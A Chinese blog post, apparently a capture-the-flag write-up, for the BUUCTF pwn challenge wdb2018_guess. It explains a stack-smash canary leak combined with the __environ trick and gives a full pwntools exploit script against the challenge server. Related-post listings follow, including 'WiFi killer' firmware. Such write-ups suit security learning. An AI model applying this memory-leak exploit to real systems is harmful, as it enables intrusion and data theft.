[BUUCTF-pwn]——wdb2018_guess (environ环境变量)

最新推荐文章于 2024-05-05 15:50:26 发布
最新推荐文章于 2024-05-05 15:50:26 发布
阅读量1.3k 收藏 3
点赞数 3
分类专栏: # BUUCTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Y_peak/article/details/115470540
版权

[BUUCTF-pwn]——wdb2018_guess

这个漏洞叫什么来着, 好像是stack smash, 具体就是主动触发canary保护来达到自己的目的.

这道题最后我也有一个小疑问, 这个程序为什么会莫名其妙执行三次. 嘶!!!

一个常见的保护开启NX canary RELRO

在IDA中看看, 那个buf就是我们要的flag
在这里插入图片描述

先主动触发一下canary看看会发送什么. 输出的是argv[0], 同时程序会再次执行,发现会重复执行三次.
在这里插入图片描述

思路

思路来了

  1. 利用主动触发canary保护, 调用**___stack_chk_fail**函数, leek出一个地址
  2. 找到对应的libc版本
  3. 在libc中保存了一个函数叫_environ,存的是当前进程的环境变量,通过_environ的地址得到_environ的值,从而得到环境变量地址,环境变量保存在栈中,所以通过栈内的偏移量,可以访问栈中任意变量, 当然也可以找到我们栈上的数据, 找到buf的地址
  4. 利用buf的地址打印flag
  • 找到多长payload才可以泄露出我们想要的数据0x128
    在这里插入图片描述

exploit

from pwn import *
from LibcSearcher import *
 
#p = process('./GUESS')
p = remote('node3.buuoj.cn',27072)
elf = ELF('./GUESS')
puts_got = elf.got['puts']
 
p.sendlineafter('Please type your guessing flag','a'*0x128 + p64(puts_got))
p.recvuntil('stack smashing detected ***: ')
puts_addr = u64(p.recv(6).ljust(8,'\x00'))
libc = LibcSearcher('puts',puts_addr)
libc_base = puts_addr - libc.dump('puts')
log.success('libc_base :' + hex(libc_base))
environ = libc_base + libc.dump('__environ')
info('environ_addr=',hex(environ))
p.sendlineafter('Please type your guessing flag','a'*0x128 + p64(environ))
p.recvuntil('stack smashing detected ***: ')
buf_addr = u64(p.recv(6).ljust(8,'\x00')) - 0x168
log.success('flag_addr=',hex(buf_addr))
p.sendlineafter('Please type your guessing flag','a'*0x128 + p64(buf_addr))
p.interactive()
Y-peak
关注
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 10
    评论
专栏目录
[BUUCTF]wdb2018_guess——Stack smash技巧
zyxx_wjc的博客
07-20 410
stack smash
PWN-PRACTICE-BUUCTF-24
P1umH0的博客
09-09 215
PWN-PRACTICE-BUUCTF-24
pwn周记 && environ && patchelf
最新发布
A13837377363的博客
05-05 192
这个标识符存在于libc中,保存当前程序的环境变量地址,也就是包含栈中的一些地址,可以通过打印environ中的内容获取栈的地址。之前为了图方便,一直使用clibc改变二进制文件的libc,但是这样改变会导致符号表没有导入。这样你在gdb的时候输入。然后在glibc-all-in-one中下载相应的libc,这样的指令去查询函数或变量位置是无效的。需要引入debug文件才能查询符号表。最好的做法是在先查询libc具体版本。这样就能查询各函数和变量了。打印exit_hook地址。最后直接引入ld和整体路径。
攻防世界PWN之sentosa题解
seaaseesa的博客
02-12 769
Sentosa 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,一个经典的增删改查程序 经过分析,程序中不存在堆溢出漏洞,唯一的漏洞在这里 如果a2是0,就会造成输入长度无限制,因为0-1变成-1,传给read,而read的size参数为无符号数,导致-1转换成无符号数,很大,可以无限制输入。 最终造成create函数里栈溢出,覆盖v6指针 如果a2是0,就会造成...
buuctf-pwn write-ups (1)
CoLin的pwn小屋
05-01 389
buuctf-pwn 001-016题wp
wdb2018_guess fork()和wait()的问题
carol2358的博客
09-02 372
这个问题困扰了我,程序动脑不如动手,就写了一个程序来判断,问题的来源是wdb2018_guess 这道题 他fork()了三次,却只有3次gets(),我想着明明有4个进程,为什么只gets了3次 #include<stdio.h> #include <sys/types.h> #include <unistd.h> #include<sys/wait.h> int main() { int stat_loc; int i=0; int n=3; in
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举,支持功能和开发模块,同时将所有这些都打包在命令行界面中,并且易于使用和可扩展的类贝壳环境。 作者 功能支持 Credential ...
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
网鼎杯pwnGUESS
Peanuts
08-30 1919
做了网鼎杯才发现自己有多菜。。。 拿到题目先ida一波 基本分析 看到了发现了是一个本地加载flag.txt所以有可能可以用stack samsh:详细可以看ctf wiki上的花式栈溢出技巧然后拖入gdb 进行一波checksec             可以发现有了nx栈不可执行这个还好,但是看到了cannary就有点头疼了。。还好有stack smash这个方法可以...
网鼎杯2018 guess(stack smashing)
seaaseesa的博客
04-30 920
wdb2018_guess stack smashing 首先,检查一下程序的保护机制 然后,我们用IDA分析一下 Flag读取并存储在栈里 Fork三次子进程,然后有gets函数,导致栈溢出,但是有canary保护。 由于使用了gets,因此可以无限制溢出,并且有三次机会。那么,我们可以利用stack smashing报错,来输出信息。第一次,我们泄露函数的got表内容,为...
pwn的一些技巧与总结
weixin_30477797的博客
09-27 856
原文地址:https://github.com/Naetw/CTF-pwn-tips 目录 溢出 在gdb中寻找字符串 二进制服务 找到libc中特定函数的偏移地址 Find '/bin/sh' or 'sh' in library Leak stack address gdb中的fork问题 Secret of a mysterious section - .tls Predictable R...
pwn-GUESS
aitangdao4981的博客
09-03 189
参考了其他wp之后才慢慢做出来的 记录一下 首先checksec一下 有canary 放到IDA看下源码 运行流程大概是 有三个fork 即三次输入机会,于是无法爆破cannary 本题用的是SSP leak,当canary被覆盖是就会触发__stack_chk_fail函数,其中会打印字符串argv[0],覆盖它就能实现任意地址读 源码中有open("./flag...
pwn学习总结
Ree的整理与收集
09-01 5741
遇到的优秀文章 关于Heap Overflow(堆溢出) Linux常见漏洞利用技术实践 GCC 中的编译器堆栈保护技术 Linux环境进程间通信(一) 现代Linux操作系统的栈溢出(一) 解读Linux安全机制之栈溢出保护工具与常用命令*nix命令 export ...="..." 添加一个环境变量,这个环境变量只在这个shell进程中起作用 gdbgdb的话一定会装peda插件。p
[BUUCTF]PWN——suctf_2018_basic pwn
mcmuyanga的博客
02-02 545
suctf_2018_basic pwn 附件 步骤 例行检查,64位程序,开启了RELRO和NX 试运行一下程序,看看大概的情况 64位ida载入,检索字符串的时候发现了读出flag的函数,flag_addr=0x401157 main() s存在溢出,简单的覆盖返回地址到后门函数类型的题目 完整exp from pwn import * r=remote('node3.buuoj.cn',25779) flag_addr=0x401157 payload='a'*(0x110+8)+p6
buuoj Pwn writeup 176-180
yongbaoii的博客
06-09 282
176 jarvisoj_itemboard 177 asis2016_b00ks 178 actf_2019_onerepeater 179 ciscn_2019_s_8 180 starctf_2019_girlfriend
BUUCTF-PWN刷题记录-7
weixin_44145820的博客
04-15 879
目录roarctf_2019_realloc_magic roarctf_2019_realloc_magic
buuctf [HarekazeCTF2019]baby_rop2
09-30
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2是一个pwn题目。在这个题目中,主要的目标是获取read函数的地址,并利用该地址泄漏libc基址,然后计算system函数和/bin/sh字符串的地址,最终执行system('/bin/sh')获取...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 10
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值